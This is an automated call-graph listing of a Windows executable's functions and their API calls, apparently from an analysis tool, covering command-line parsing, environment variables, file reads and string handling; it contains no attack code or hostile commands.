20011->20012 20013 d689b4 20012->20013 20014 d689fc codecvt 20013->20014 20015 d65e70 20 API calls 20013->20015 20018 d68a30 23 API calls 20014->20018 20016 d689c7 wsprintfW 20015->20016 20017 d79450 4 API calls 20016->20017 20017->20014 20019 d68a1d 20018->20019 20020 d74cd0 codecvt ??3@YAXPAX 20019->20020 20021 d68a28 20020->20021 20021->20007 20022->20010 20095 d728c6 20096 d728d5 20095->20096 20097 d74340 4 API calls 20096->20097 20098 d72adb codecvt 20096->20098 20101 d728ef 20097->20101 20099 d6f230 11 API calls 20098->20099 20100 d72b31 20099->20100 20102 d6f630 codecvt ??3@YAXPAX 20100->20102 20103 d72954 20101->20103 20129 d70ba0 _CxxThrowException 20101->20129 20105 d72b3c 20102->20105 20106 d73d80 2 API calls 20103->20106 20131 d704f0 ??3@YAXPAX 20105->20131 20108 d72966 ??2@YAPAXI 20106->20108 20111 d7297f codecvt 20108->20111 20109 d72b47 20110 d6f590 codecvt ??3@YAXPAX 20109->20110 20127 d72a77 20110->20127 20112 d6b950 155 API calls 20111->20112 20113 d72a1c 20112->20113 20114 d72a37 20113->20114 20125 d72a82 codecvt 20113->20125 20115 d634f0 codecvt 11 API calls 20114->20115 20116 d72a4e 20115->20116 20118 d6f230 11 API calls 20116->20118 20117 d72ad0 20120 d634f0 codecvt 11 API calls 20117->20120 20119 d72a56 20118->20119 20121 d6f630 codecvt ??3@YAXPAX 20119->20121 20120->20098 20122 d72a61 20121->20122 20130 d704f0 ??3@YAXPAX 20122->20130 20124 d72a6c 20126 d6f590 codecvt ??3@YAXPAX 20124->20126 20125->20117 20128 d708c0 _CxxThrowException 20125->20128 20126->20127 20128->20117 20129->20103 20130->20124 20131->20109 16398 d879cf 16400 d879db _Error_objects 16398->16400 16399 d879f1 InterlockedCompareExchange 16399->16400 16401 d87a02 16399->16401 16400->16399 16400->16401 16402 d87a0a Sleep 16400->16402 16403 d87a23 _amsg_exit 16401->16403 16406 d87a2d __initterm_e 16401->16406 16402->16399 16403->16406 16404 d87a8c 16407 d87a91 InterlockedExchange 16404->16407 16411 d87a99 16404->16411 16405 d87a71 _initterm 16405->16404 16406->16404 16406->16405 16410 d87a51 _Error_objects 16406->16410 16407->16411 16415 d67530 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z GetLastError GetTickCount 16411->16415 16412 d87b18 16412->16410 16414 d87b20 _cexit 16412->16414 16413 d87ae1 exit _XcptFilter 16414->16410 16416 d6755e GetTickCount 16415->16416 16417 d67578 16415->16417 16416->16417 16418 d6756b GetTickCount 16416->16418 16751 d610d0 16417->16751 16418->16417 16421 d610d0 _Error_objects ??2@YAPAXI 16422 d675b8 16421->16422 16423 d610d0 _Error_objects ??2@YAPAXI 16422->16423 16424 d675c0 GetModuleHandleW GetProcAddress FreeConsole 16423->16424 16754 d66680 LoadLibraryA #17 16424->16754 16432 d6760d codecvt 16797 d66d00 16432->16797 16435 d67662 16802 d635b0 16435->16802 16436 d67630 17051 d67310 16436->17051 16441 d74cd0 codecvt ??3@YAXPAX 16444 d67647 16441->16444 16442 d67683 17071 d6b300 16442->17071 16443 d676bc 16450 d66d00 3 API calls 16443->16450 16447 d74cd0 codecvt ??3@YAXPAX 16444->16447 16449 d6764f 16447->16449 16448 d74cd0 codecvt ??3@YAXPAX 16451 d676a1 16448->16451 16452 d74cd0 codecvt ??3@YAXPAX 16449->16452 16453 d676d4 16450->16453 16454 d74cd0 codecvt ??3@YAXPAX 16451->16454 16667 d67657 16452->16667 16455 d676e0 16453->16455 16456 d6770d 16453->16456 16457 d676a9 16454->16457 16459 d74cd0 codecvt ??3@YAXPAX 16455->16459 16810 d62370 16456->16810 16460 d74cd0 codecvt ??3@YAXPAX 16457->16460 16462 d676f2 16459->16462 16460->16667 16464 d74cd0 codecvt ??3@YAXPAX 16462->16464 16463 d62370 _DebugHeapAllocator 3 API calls 16471 d6772b codecvt 16463->16471 16465 d676fa 16464->16465 16466 d74cd0 codecvt ??3@YAXPAX 16465->16466 16466->16667 16467 d677d2 codecvt 16840 d661c0 16467->16840 16470 d61d50 _DebugHeapAllocator 3 API calls 16472 d67800 codecvt 16470->16472 16471->16467 16473 d61d50 _DebugHeapAllocator 3 API calls 16471->16473 16843 d611c0 16472->16843 16474 d6776f codecvt 16473->16474 16477 d61d50 _DebugHeapAllocator 3 API calls 16474->16477 16485 d6778b 16477->16485 16478 d67860 16849 d63b10 16478->16849 16479 d6781c codecvt 16482 d6b300 51 API calls 16479->16482 16484 d67830 16482->16484 16487 d74cd0 codecvt ??3@YAXPAX 16484->16487 16488 d62370 _DebugHeapAllocator 3 API calls 16485->16488 16486 d67872 16856 d661f0 16486->16856 16489 d67845 16487->16489 16490 d677bd 16488->16490 16491 d74cd0 codecvt ??3@YAXPAX 16489->16491 16813 d65e70 16490->16813 16495 d6784d 16491->16495 16499 d74cd0 codecvt ??3@YAXPAX 16495->16499 16497 d67894 16501 d74cd0 codecvt ??3@YAXPAX 16497->16501 16498 d678c8 16502 d66d00 3 API calls 16498->16502 16499->16667 16503 d678a5 16501->16503 16504 d678d6 16502->16504 16505 d74cd0 codecvt ??3@YAXPAX 16503->16505 16511 d678e6 16504->16511 16519 d679b1 16504->16519 16506 d678ad 16505->16506 16507 d74cd0 codecvt ??3@YAXPAX 16506->16507 16513 d678b5 16507->16513 16508 d67a06 16877 d68540 16508->16877 16509 d679c0 wsprintfW 16514 d65e70 20 API calls 16509->16514 16512 d6797c 16511->16512 17082 d66ab0 16511->17082 16515 d74cd0 codecvt ??3@YAXPAX 16512->16515 16518 d74cd0 codecvt ??3@YAXPAX 16513->16518 16514->16519 16520 d6798e 16515->16520 16518->16667 16519->16508 16519->16509 16523 d636c0 13 API calls 16519->16523 16524 d74cd0 codecvt ??3@YAXPAX 16520->16524 16523->16519 16527 d67996 16524->16527 16526 d6793b 16530 d6b300 51 API calls 16526->16530 16532 d74cd0 codecvt ??3@YAXPAX 16527->16532 16528 d67a57 16889 d66dc0 16528->16889 16529 d67a22 16533 d74cd0 codecvt ??3@YAXPAX 16529->16533 16534 d67944 16530->16534 16536 d6799e 16532->16536 16537 d67a34 16533->16537 16538 d74cd0 codecvt ??3@YAXPAX 16534->16538 16540 d74cd0 codecvt ??3@YAXPAX 16536->16540 16541 d74cd0 codecvt ??3@YAXPAX 16537->16541 16542 d67959 16538->16542 16540->16667 16543 d67a3c 16541->16543 16544 d74cd0 codecvt ??3@YAXPAX 16542->16544 16545 d74cd0 codecvt ??3@YAXPAX 16543->16545 16546 d67961 16544->16546 16548 d67a44 16545->16548 16549 d74cd0 codecvt ??3@YAXPAX 16546->16549 16550 d74cd0 codecvt ??3@YAXPAX 16548->16550 16551 d67969 16549->16551 16550->16667 16553 d74cd0 codecvt ??3@YAXPAX 16551->16553 16552 d67ab7 16970 d66880 16552->16970 16553->16667 16556 d67aac 16558 d74cd0 codecvt ??3@YAXPAX 16556->16558 16557 d67b07 16559 d67b2f 16557->16559 16564 d67bb8 16557->16564 16558->16552 16560 d64c00 lstrcmpW 16559->16560 16561 d67b3b 16560->16561 16562 d67b4e 16561->16562 16565 d65e70 20 API calls 16561->16565 17125 d68430 16562->17125 16563 d67bdb CoInitializeEx 16568 d64c00 lstrcmpW 16563->16568 16564->16563 16565->16562 16571 d67bf1 16568->16571 16569 d67a66 codecvt 16569->16552 16569->16556 16942 d64c00 16569->16942 16945 d616a0 16569->16945 16948 d636c0 16569->16948 16967 d74cd0 16569->16967 16574 d67c0b 16571->16574 16576 d61d50 _DebugHeapAllocator 3 API calls 16571->16576 16977 d66800 16574->16977 16576->16574 16580 d74cd0 codecvt ??3@YAXPAX 16581 d67b95 16580->16581 16582 d74cd0 codecvt ??3@YAXPAX 16581->16582 16584 d67b9d 16582->16584 16585 d74cd0 codecvt ??3@YAXPAX 16584->16585 16586 d67ba5 16585->16586 16587 d74cd0 codecvt ??3@YAXPAX 16586->16587 16587->16667 16667->16412 16667->16413 17345 d79220 ??2@YAPAXI 16751->17345 16753 d610df 16753->16421 16755 d666a4 16754->16755 16756 d65e70 20 API calls 16755->16756 16757 d666ab 16756->16757 16758 d65e70 20 API calls 16757->16758 16759 d666ba 16758->16759 16760 d65e70 20 API calls 16759->16760 16761 d666c9 16760->16761 16762 d65e70 20 API calls 16761->16762 16763 d666d8 16762->16763 16764 d65e70 20 API calls 16763->16764 16765 d666e7 16764->16765 16766 d65e70 20 API calls 16765->16766 16771 d666f6 16766->16771 16767 d667ed GetCommandLineW 16773 d638f0 16767->16773 16768 d6673a SHGetSpecialFolderPathW 16769 d6675a wsprintfW 16768->16769 16768->16771 16770 d636c0 13 API calls 16769->16770 16770->16771 16771->16767 16771->16768 16772 d636c0 13 API calls 16771->16772 16772->16771 16774 d6394b 16773->16774 16776 d638fe 16773->16776 16775 d63936 16774->16775 16777 d61c50 4 API calls 16774->16777 16779 d61d50 16775->16779 16776->16775 16778 d61c50 4 API calls 16776->16778 16777->16774 16778->16776 17346 d79300 16779->17346 16782 d64320 16783 d610d0 _Error_objects ??2@YAPAXI 16782->16783 16784 d6432e codecvt 16783->16784 16785 d64465 16784->16785 16789 d61c50 memcpy _CxxThrowException ??2@YAPAXI ??3@YAXPAX 16784->16789 16792 d610d0 _Error_objects ??2@YAPAXI 16784->16792 16794 d62370 _DebugHeapAllocator 3 API calls 16784->16794 16796 d74cd0 ??3@YAXPAX codecvt 16784->16796 17353 d64480 16784->17353 17356 d639a0 16784->17356 17367 d794b0 16784->17367 16786 d62370 _DebugHeapAllocator 3 API calls 16785->16786 16787 d64471 16786->16787 16788 d74cd0 codecvt ??3@YAXPAX 16787->16788 16790 d64479 16788->16790 16789->16784 16790->16432 16792->16784 16794->16784 16796->16784 16798 d66d04 16797->16798 16799 d66d5a lstrlenW lstrlenW 16798->16799 16800 d66d82 16798->16800 17388 d65ae0 16799->17388 16800->16435 16800->16436 16803 d62c60 _DebugHeapAllocator 2 API calls 16802->16803 16804 d635c5 codecvt 16803->16804 17400 d63a50 16804->17400 16807 d635f5 codecvt 16808 d74cd0 codecvt ??3@YAXPAX 16807->16808 16809 d63600 GetModuleFileNameW 16808->16809 16809->16442 16809->16443 17407 d793a0 16810->17407 16814 d65e82 16813->16814 16815 d65ebe 16814->16815 16816 d65ec8 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 16814->16816 16834 d79450 16815->16834 16817 d65f06 ??2@YAPAXI GetEnvironmentVariableW 16816->16817 16818 d65fff SetLastError 16816->16818 16819 d65fe7 ??3@YAXPAX 16817->16819 16820 d65f52 GetLastError 16817->16820 16818->16815 16821 d66029 16818->16821 16819->16818 16820->16819 16822 d65f60 16820->16822 16823 d66047 16821->16823 16824 d66063 lstrlenA ??2@YAPAXI 16821->16824 16827 d65fd4 16822->16827 16828 d65f6f lstrcmpiW 16822->16828 17414 d65e00 16823->17414 16825 d660f2 MultiByteToWideChar 16824->16825 16826 d660b3 GetLocaleInfoW 16824->16826 16825->16815 16826->16825 16830 d660dd _wtol 16826->16830 16827->16818 16831 d65fbc ??3@YAXPAX 16828->16831 16832 d65f8a ??3@YAXPAX 16828->16832 16830->16825 16831->16827 16832->16827 16835 d79462 _DebugHeapAllocator 16834->16835 16836 d790a0 4 API calls 16835->16836 16837 d79474 16836->16837 17419 d71470 memcpy 16837->17419 16839 d79493 16839->16467 17420 d66180 GetProcAddress 16840->17420 16844 d611cf 16843->16844 16847 d61209 16844->16847 17423 d76de0 16844->17423 16847->16478 16847->16479 17460 d78c40 ??2@YAPAXI 16849->17460 16851 d63b1f 16852 d68790 16851->16852 16854 d687a1 codecvt 16852->16854 16853 d687e8 16853->16486 16854->16853 17461 d665d0 16854->17461 16857 d63b10 ??2@YAPAXI 16856->16857 16858 d661fe 16857->16858 16876 d76de0 3 API calls 16858->16876 16859 d66214 17471 d63e20 16859->17471 16861 d6622b 16862 d66235 16861->16862 16866 d66255 codecvt 16861->16866 16863 d6b300 51 API calls 16862->16863 16864 d6623e 16863->16864 16865 d74cd0 codecvt ??3@YAXPAX 16864->16865 16871 d66250 16865->16871 16867 d6628d 16866->16867 17483 d64510 16866->17483 16869 d6629f 16867->16869 17546 d662c0 16867->17546 16870 d74cd0 codecvt ??3@YAXPAX 16869->16870 16870->16871 16871->16497 16871->16498 16874 d66279 16875 d74cd0 codecvt ??3@YAXPAX 16874->16875 16875->16871 16876->16859 16878 d61d50 _DebugHeapAllocator 3 API calls 16877->16878 16879 d68557 16878->16879 16880 d79450 4 API calls 16879->16880 16881 d67a14 16880->16881 16882 d61760 16881->16882 16885 d61770 16882->16885 16883 d617cc 16883->16528 16883->16529 16884 d63880 lstrlenW lstrlenW _wcsnicmp 16884->16885 16885->16883 16885->16884 16886 d616e0 78 API calls 16885->16886 16887 d61a8b _wtol 16885->16887 17633 d61520 16885->17633 16886->16885 16887->16885 16890 d64c00 lstrcmpW 16889->16890 16891 d66dd2 16890->16891 16892 d61d50 _DebugHeapAllocator 3 API calls 16891->16892 16901 d66e01 codecvt 16891->16901 16894 d66dec 16892->16894 16893 d64c00 lstrcmpW 16895 d66e25 16893->16895 16896 d65e70 20 API calls 16894->16896 16897 d64c00 lstrcmpW 16895->16897 16898 d66df3 16896->16898 16899 d66e46 16897->16899 16900 d79450 4 API calls 16898->16900 16902 d64c00 lstrcmpW 16899->16902 16900->16901 16901->16893 16903 d66e66 16902->16903 16904 d66e72 lstrcmpiW 16903->16904 16905 d66e85 16903->16905 16904->16905 16906 d64c00 lstrcmpW 16905->16906 16907 d66e9b 16906->16907 16908 d64c00 lstrcmpW 16907->16908 16909 d66ed8 16908->16909 16912 d66eed 16909->16912 17679 d66a40 16909->17679 16911 d64c00 lstrcmpW 16911->16912 16912->16911 16915 d66f28 16912->16915 17683 d669c0 16912->17683 16914 d64c00 lstrcmpW 16914->16915 16915->16914 16916 d66f60 16915->16916 17687 d66a00 16915->17687 16918 d64c00 lstrcmpW 16916->16918 16919 d66f6c 16918->16919 16920 d64c00 lstrcmpW 16919->16920 16921 d66f80 16920->16921 16922 d64c00 lstrcmpW 16921->16922 16923 d66f94 16922->16923 16924 d66fb2 16923->16924 16925 d66fa0 _wtol 16923->16925 16926 d64c00 lstrcmpW 16924->16926 16925->16924 16927 d66fbe 16926->16927 16928 d66fdc 16927->16928 16929 d66fca _wtol 16927->16929 16930 d64c00 lstrcmpW 16928->16930 16929->16928 16931 d66fe8 16930->16931 16932 d64c00 lstrcmpW 16931->16932 16933 d67009 16932->16933 16934 d64c00 lstrcmpW 16933->16934 16935 d67029 16934->16935 16936 d61230 16935->16936 16937 d61241 codecvt 16936->16937 16939 d61245 16937->16939 16940 d76de0 3 API calls 16937->16940 16938 d6126d codecvt 17695 d6ffb0 16938->17695 16939->16569 16940->16938 16943 d641e0 lstrcmpW 16942->16943 16944 d64c11 codecvt 16943->16944 16944->16569 18944 d79270 16945->18944 16949 d63740 ??2@YAPAXI 16948->16949 16950 d636ce 16949->16950 16951 d61d50 _DebugHeapAllocator 3 API calls 16950->16951 16952 d636da 16951->16952 16953 d61d50 _DebugHeapAllocator 3 API calls 16952->16953 16954 d636e6 16953->16954 18952 d66500 ??2@YAPAXI 16954->18952 16957 d63732 16958 d63770 codecvt ??3@YAXPAX 16957->16958 16960 d6373a 16958->16960 16959 d616a0 _DebugHeapAllocator 2 API calls 16961 d63707 16959->16961 16960->16569 16962 d79450 4 API calls 16961->16962 16963 d63713 codecvt 16962->16963 16964 d636c0 13 API calls 16963->16964 16965 d63727 16964->16965 16966 d74cd0 codecvt ??3@YAXPAX 16965->16966 16966->16957 18963 d704f0 ??3@YAXPAX 16967->18963 16969 d74cdf 16969->16569 16974 d6688f codecvt 16970->16974 16971 d668fc 16971->16557 16972 d62c60 _DebugHeapAllocator 2 API calls 16972->16974 16974->16971 16974->16972 16975 d668eb SetEnvironmentVariableW 16974->16975 18964 d66850 16974->18964 16976 d74cd0 codecvt ??3@YAXPAX 16975->16976 16976->16974 16978 d63d90 12 API calls 16977->16978 16979 d6680c 16978->16979 19056 d65930 16979->19056 19682 d67410 17051->19682 17054 d65e70 20 API calls 17055 d67335 17054->17055 17056 d616a0 _DebugHeapAllocator 2 API calls 17055->17056 17062 d67344 17056->17062 17057 d673a4 17058 d79450 4 API calls 17057->17058 17061 d673b6 17058->17061 17059 d79450 4 API calls 17059->17062 17063 d79450 4 API calls 17061->17063 17062->17057 17062->17059 19685 d79510 17062->19685 17064 d673c6 codecvt 17063->17064 17065 d697f0 18 API calls 17064->17065 17066 d673e7 17065->17066 17067 d74cd0 codecvt ??3@YAXPAX 17066->17067 17068 d673f2 17067->17068 17069 d68460 codecvt ??3@YAXPAX 17068->17069 17070 d673fd 17069->17070 17070->16441 17072 d65e70 20 API calls 17071->17072 17073 d6b312 wvsprintfW 17072->17073 17074 d6b476 17073->17074 17075 d6b33d GetLastError FormatMessageW 17073->17075 17078 d6b260 20 API calls 17074->17078 17076 d6b376 FormatMessageW 17075->17076 17077 d6b3a1 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 17075->17077 17076->17074 17076->17077 19692 d6b260 17077->19692 17080 d6768c 17078->17080 17080->16448 17083 d66abe 17082->17083 17084 d63350 2 API calls 17083->17084 17085 d66acc 17084->17085 17086 d66b6e 17085->17086 17088 d616a0 _DebugHeapAllocator 2 API calls 17085->17088 17087 d63b10 ??2@YAPAXI 17086->17087 17089 d66b76 17087->17089 17090 d66ae3 17088->17090 19706 d66c20 17089->19706 17094 d66af8 17090->17094 17099 d66b14 codecvt 17090->17099 17095 d74cd0 codecvt ??3@YAXPAX 17094->17095 17097 d66b04 17095->17097 17096 d66b90 17100 d78e20 4 API calls 17096->17100 19703 d634b0 17097->19703 17102 d64c30 81 API calls 17099->17102 17103 d66ba1 17100->17103 17101 d66b0c 17101->16512 17101->16526 17105 d66b2e 17102->17105 17104 d78e20 4 API calls 17103->17104 17112 d66bae codecvt 17104->17112 17106 d66b4a 17105->17106 17107 d63350 2 API calls 17105->17107 17108 d74cd0 codecvt ??3@YAXPAX 17106->17108 17110 d66b43 17107->17110 17109 d66b56 17108->17109 17111 d634b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17109->17111 17110->17106 17113 d66b66 17110->17113 17111->17101 19713 d77000 17112->19713 17114 d74cd0 codecvt ??3@YAXPAX 17113->17114 17114->17086 17116 d66bcd codecvt 17117 d66bde 17116->17117 17120 d66bf7 17116->17120 17118 d74cd0 codecvt ??3@YAXPAX 17117->17118 17119 d66bea 17118->17119 17121 d634b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17119->17121 17122 d74cd0 codecvt ??3@YAXPAX 17120->17122 17121->17101 17123 d66c03 17122->17123 17124 d634b0 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 17123->17124 17124->17101 17126 d67490 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 17125->17126 17127 d67b5f 17126->17127 17128 d697f0 17127->17128 17129 d67b78 17128->17129 17130 d697ff 17128->17130 17142 d68460 17129->17142 17130->17129 17131 d616a0 _DebugHeapAllocator 2 API calls 17130->17131 17132 d69815 17131->17132 17133 d616a0 _DebugHeapAllocator 2 API calls 17132->17133 17134 d69821 17133->17134 17135 d66850 18 API calls 17134->17135 17136 d6982a 17135->17136 17137 d66850 18 API calls 17136->17137 17138 d69836 codecvt 17137->17138 17139 d74cd0 codecvt ??3@YAXPAX 17138->17139 17140 d6987a 17139->17140 17141 d74cd0 codecvt ??3@YAXPAX 17140->17141 17141->17129 17143 d6b1e0 codecvt ??3@YAXPAX 17142->17143 17144 d67b8d 17143->17144 17144->16580 17345->16753 17347 d79312 _DebugHeapAllocator 17346->17347 17348 d79323 ??2@YAPAXI ??3@YAXPAX 17347->17348 17349 d79370 17347->17349 17348->17349 17352 d71470 memcpy 17349->17352 17351 d61d63 17351->16782 17352->17351 17372 d78c90 17353->17372 17357 d610d0 _Error_objects ??2@YAPAXI 17356->17357 17360 d639ae codecvt 17357->17360 17358 d62c60 _DebugHeapAllocator 2 API calls 17359 d63a14 17358->17359 17361 d74cd0 codecvt ??3@YAXPAX 17359->17361 17363 d635b0 7 API calls 17360->17363 17366 d63a08 17360->17366 17362 d63a1c 17361->17362 17362->16784 17364 d639da codecvt 17363->17364 17365 d639ec MultiByteToWideChar 17364->17365 17365->17366 17366->17358 17376 d790a0 17367->17376 17371 d794ea 17371->16784 17375 d78b40 ??2@YAPAXI 17372->17375 17374 d64494 17374->16784 17375->17374 17377 d790c2 17376->17377 17378 d790c0 17376->17378 17381 d78eb0 17377->17381 17380 d71470 memcpy 17378->17380 17380->17371 17382 d78ec4 17381->17382 17383 d78ecd _CxxThrowException 17381->17383 17382->17383 17384 d78ee2 ??2@YAPAXI 17382->17384 17383->17384 17387 d71470 memcpy 17384->17387 17386 d78f23 ??3@YAXPAX 17386->17378 17387->17386 17390 d65aee 17388->17390 17389 d65b75 17389->16800 17390->17389 17391 d65ba0 CharUpperW 17390->17391 17392 d65b4f 17390->17392 17391->17390 17396 d65ba0 17392->17396 17395 d65ba0 CharUpperW 17395->17389 17397 d65bb2 17396->17397 17399 d65b5f 17396->17399 17398 d65bd3 CharUpperW 17397->17398 17397->17399 17398->17399 17399->17395 17401 d63a62 17400->17401 17402 d635e3 wcsncpy 17400->17402 17404 d78f60 17401->17404 17402->16807 17405 d78f87 ??2@YAPAXI ??3@YAXPAX 17404->17405 17406 d78f72 _CxxThrowException 17404->17406 17405->17402 17406->17405 17408 d793b9 17407->17408 17409 d62383 17407->17409 17410 d793cd ??2@YAPAXI ??3@YAXPAX 17408->17410 17411 d7941a 17408->17411 17409->16463 17410->17411 17413 d71470 memcpy 17411->17413 17413->17409 17415 d65e2c 17414->17415 17416 d65e0e GetUserDefaultUILanguage 17414->17416 17415->16824 17416->17415 17417 d65e35 GetSystemDefaultUILanguage 17416->17417 17417->17415 17418 d65e46 GetSystemDefaultLCID 17417->17418 17418->17415 17419->16839 17421 d661a0 GetNativeSystemInfo 17420->17421 17422 d661ad 17420->17422 17421->17422 17422->16470 17424 d76df3 17423->17424 17425 d611fb 17423->17425 17432 d767b0 17424->17432 17429 d61370 17425->17429 17427 d76e0e 17437 d76da0 17427->17437 17442 d768d0 17429->17442 17440 d87950 17432->17440 17435 d767f1 GetLastError 17436 d767fb 17435->17436 17436->17427 17438 d76db0 GetLastError 17437->17438 17439 d76dac _HRESULT_FROM_WIN32 17437->17439 17438->17439 17439->17425 17441 d767c7 SetFilePointer 17440->17441 17441->17435 17441->17436 17445 d768a0 17442->17445 17448 d76860 17445->17448 17451 d766c0 17448->17451 17456 d76710 17451->17456 17454 d61386 17454->16847 17455 d766da CreateFileW 17455->17454 17457 d76723 CloseHandle 17456->17457 17458 d766cf 17456->17458 17459 d76733 17457->17459 17458->17454 17458->17455 17459->17458 17460->16851 17466 d63770 17461->17466 17464 d665e7 ??3@YAXPAX 17465 d665f3 17464->17465 17465->16854 17467 d74cd0 codecvt ??3@YAXPAX 17466->17467 17468 d63782 17467->17468 17469 d74cd0 codecvt ??3@YAXPAX 17468->17469 17470 d6378a 17469->17470 17470->17464 17470->17465 17472 d63e2d 17471->17472 17482 d76de0 3 API calls 17472->17482 17473 d63e43 17474 d63e4b lstrlenA lstrlenA 17473->17474 17479 d63e85 17474->17479 17475 d63ea1 codecvt 17475->16861 17476 d64028 memmove 17476->17479 17477 d63fcb memcmp 17477->17479 17478 d63f49 memcmp 17478->17475 17478->17479 17479->17475 17479->17476 17479->17477 17479->17478 17549 d76d10 17479->17549 17554 d640a0 17479->17554 17482->17473 17484 d63b10 ??2@YAPAXI 17483->17484 17544 d64525 codecvt 17484->17544 17485 d64549 17486 d74cd0 codecvt ??3@YAXPAX 17485->17486 17487 d645d1 17486->17487 17487->16867 17487->16874 17490 d62370 memcpy ??2@YAPAXI ??3@YAXPAX _DebugHeapAllocator 17490->17544 17491 d74cd0 ??3@YAXPAX codecvt 17491->17544 17492 d645a9 17587 d64100 17492->17587 17495 d63770 codecvt ??3@YAXPAX 17497 d645c9 17495->17497 17496 d645f9 17498 d64100 57 API calls 17496->17498 17499 d74cd0 codecvt ??3@YAXPAX 17497->17499 17500 d6460b 17498->17500 17499->17487 17502 d63770 codecvt ??3@YAXPAX 17500->17502 17501 d6463d 17503 d64100 57 API calls 17501->17503 17504 d64619 17502->17504 17505 d6464f 17503->17505 17506 d74cd0 codecvt ??3@YAXPAX 17504->17506 17507 d63770 codecvt ??3@YAXPAX 17505->17507 17506->17487 17509 d6465d 17507->17509 17508 d6468d 17510 d64100 57 API calls 17508->17510 17511 d74cd0 codecvt ??3@YAXPAX 17509->17511 17512 d6469f 17510->17512 17511->17487 17513 d63770 codecvt ??3@YAXPAX 17512->17513 17514 d646ad 17513->17514 17515 d74cd0 codecvt ??3@YAXPAX 17514->17515 17515->17487 17516 d6470c 17517 d64100 57 API calls 17516->17517 17519 d6471e 17517->17519 17518 d639a0 9 API calls 17518->17544 17520 d63770 codecvt ??3@YAXPAX 17519->17520 17523 d6472c 17520->17523 17522 d64767 17524 d64100 57 API calls 17522->17524 17525 d74cd0 codecvt ??3@YAXPAX 17523->17525 17526 d64779 17524->17526 17525->17487 17527 d63770 codecvt ??3@YAXPAX 17526->17527 17528 d64787 17527->17528 17530 d74cd0 codecvt ??3@YAXPAX 17528->17530 17529 d64320 15 API calls 17529->17544 17530->17487 17531 d648a7 lstrcmpW 17531->17544 17532 d640a0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 17532->17544 17533 d648ff lstrlenW 17533->17544 17534 d648c0 17537 d64100 57 API calls 17534->17537 17535 d6491a wcsncmp 17535->17544 17536 d66500 6 API calls 17536->17544 17538 d648d2 17537->17538 17539 d63770 codecvt ??3@YAXPAX 17538->17539 17541 d648e0 17539->17541 17543 d74cd0 codecvt ??3@YAXPAX 17541->17543 17542 d63770 ??3@YAXPAX codecvt 17542->17544 17543->17487 17544->17485 17544->17490 17544->17491 17544->17492 17544->17496 17544->17501 17544->17508 17544->17516 17544->17518 17544->17522 17544->17529 17544->17531 17544->17532 17544->17533 17544->17534 17544->17535 17544->17536 17544->17542 17545 d61d50 _DebugHeapAllocator 3 API calls 17544->17545 17571 d63740 17544->17571 17576 d64a40 17544->17576 17603 d644a0 17544->17603 17608 d641e0 17544->17608 17545->17544 17629 d78d90 17546->17629 17548 d662d3 17548->16869 17558 d76940 17549->17558 17552 d76d4a GetLastError 17553 d76d46 _HRESULT_FROM_WIN32 17552->17553 17553->17479 17555 d640b7 17554->17555 17556 d640bf 17554->17556 17564 d78b90 17555->17564 17556->17479 17559 d76952 17558->17559 17562 d768f0 ReadFile 17559->17562 17561 d7696f 17561->17552 17561->17553 17563 d76920 17562->17563 17563->17561 17567 d78a30 17564->17567 17566 d78bce 17566->17556 17568 d78a44 17567->17568 17569 d78a4d _CxxThrowException 17567->17569 17568->17569 17570 d78a62 ??2@YAPAXI memcpy ??3@YAXPAX 17568->17570 17569->17570 17570->17566 17572 d610d0 _Error_objects ??2@YAPAXI 17571->17572 17573 d6374f 17572->17573 17574 d610d0 _Error_objects ??2@YAPAXI 17573->17574 17575 d6375a 17574->17575 17575->17544 17577 d63b10 ??2@YAPAXI 17576->17577 17580 d64a4e 17577->17580 17578 d64ac2 17579 d74cd0 codecvt ??3@YAXPAX 17578->17579 17586 d64aae 17579->17586 17580->17578 17581 d64a9a 17580->17581 17584 d640a0 4 API calls 17580->17584 17612 d63bb0 17581->17612 17584->17580 17585 d74cd0 codecvt ??3@YAXPAX 17585->17586 17586->17544 17588 d63b10 ??2@YAPAXI 17587->17588 17589 d6410e 17588->17589 17590 d64174 17589->17590 17599 d640a0 4 API calls 17589->17599 17591 d639a0 9 API calls 17590->17591 17592 d64186 17591->17592 17593 d641ae codecvt 17592->17593 17594 d64191 codecvt 17592->17594 17596 d6b300 51 API calls 17593->17596 17595 d6b300 51 API calls 17594->17595 17597 d641a9 17595->17597 17596->17597 17598 d74cd0 codecvt ??3@YAXPAX 17597->17598 17600 d641cf 17598->17600 17599->17589 17601 d74cd0 codecvt ??3@YAXPAX 17600->17601 17602 d641d7 17601->17602 17602->17495 17605 d644ad codecvt 17603->17605 17604 d64502 17604->17544 17605->17604 17606 d644de lstrcmpW 17605->17606 17619 d66550 17605->17619 17606->17605 17610 d641ec codecvt 17608->17610 17609 d64247 17609->17544 17610->17609 17611 d6423c lstrcmpW 17610->17611 17611->17609 17611->17610 17615 d78cc0 17612->17615 17614 d63bc3 17614->17585 17618 d78b40 ??2@YAPAXI 17615->17618 17617 d78cd6 _DebugHeapAllocator 17617->17614 17618->17617 17620 d66565 codecvt 17619->17620 17621 d665d0 codecvt 2 API calls 17620->17621 17623 d66580 17620->17623 17621->17623 17625 d66600 17623->17625 17628 d66630 memmove 17625->17628 17627 d66598 17627->17605 17628->17627 17630 d78da6 17629->17630 17631 d78da1 _DebugHeapAllocator 17629->17631 17630->17631 17632 d78dba ??2@YAPAXI ??3@YAXPAX 17630->17632 17631->17548 17632->17631 17634 d6152d 17633->17634 17635 d61539 lstrlenW 17634->17635 17637 d6157f 17634->17637 17652 d61662 17634->17652 17636 d65ae0 CharUpperW 17635->17636 17636->17634 17638 d616a0 _DebugHeapAllocator 2 API calls 17637->17638 17639 d6158b codecvt 17638->17639 17653 d63a80 17639->17653 17642 d64510 71 API calls 17643 d61641 17642->17643 17644 d61667 17643->17644 17645 d6164b 17643->17645 17646 d74cd0 codecvt ??3@YAXPAX 17644->17646 17647 d74cd0 codecvt ??3@YAXPAX 17645->17647 17648 d6167b 17646->17648 17649 d6165a 17647->17649 17650 d74cd0 codecvt ??3@YAXPAX 17648->17650 17651 d74cd0 codecvt ??3@YAXPAX 